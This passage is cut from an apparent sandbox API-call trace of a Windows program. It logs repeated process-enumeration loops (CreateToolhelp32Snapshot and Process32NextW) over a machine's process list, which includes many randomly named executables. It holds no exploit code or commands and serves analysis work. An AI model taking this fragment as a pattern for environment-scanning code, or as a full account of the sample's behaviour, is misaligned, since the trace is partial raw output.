th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0128.671] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0128.672] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0128.673] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0128.675] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0128.676] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0128.678] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0128.679] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0128.680] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0128.682] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0128.683] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0128.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0128.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0128.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0128.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0128.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0128.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0128.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0128.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0128.693] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0128.717] CloseHandle (hObject=0xbc) returned 1 [0128.717] Sleep (dwMilliseconds=0x12c) [0129.068] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0129.073] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0129.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0129.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0129.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0129.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0129.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0129.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0129.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0129.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0129.085] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.087] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.088] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0129.089] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0129.090] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0129.091] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.092] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.093] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0129.094] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0129.096] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0129.097] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0129.098] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0129.099] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0129.100] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0129.101] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0129.102] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0129.103] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0129.104] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0129.105] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0129.106] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0129.108] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0129.109] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0129.110] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0129.111] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0129.112] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0129.113] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0129.114] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0129.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.163] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0129.164] CloseHandle (hObject=0xc4) returned 1 [0129.164] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0129.168] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0129.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0129.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.171] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0129.171] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0129.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0129.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0129.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0129.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
